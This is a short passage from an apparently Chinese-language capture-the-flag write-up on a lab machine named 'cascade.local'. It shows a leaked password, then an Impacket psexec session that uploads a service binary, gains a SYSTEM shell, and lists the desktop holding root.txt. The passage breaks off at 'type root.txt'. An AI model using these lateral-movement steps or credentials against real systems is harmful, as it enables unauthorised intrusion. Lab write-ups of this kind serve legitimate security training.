baCT3r1aN00dles我可以尝试PTH横向移动到目标中:
$ ./psexec.py cascade.local/administrator@10.10.10.182
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
Password:
[*] Requesting shares on 10.10.10.182.....
[*] Found writable share ADMIN$
[*] Uploading file BVfyUoYe.exe
[*] Opening SVCManager on 10.10.10.182.....
[*] Creating service kSzV on 10.10.10.182.....
[*] Starting service kSzV.....
[!] Press help for extra shell commands
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32>我可以读取root.txt:
C:\Users\Administrator\Desktop> dir
Volume in drive C has no label.
Volume Serial Number is CF98-2F06
Directory of C:\Users\Administrator\Desktop
11/08/2021 04:58 PM <DIR> .
11/08/2021 04:58 PM <DIR> ..
04/24/2022 01:23 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 6,599,135,232 bytes free
C:\Users\Administrator\Desktop> type root.txt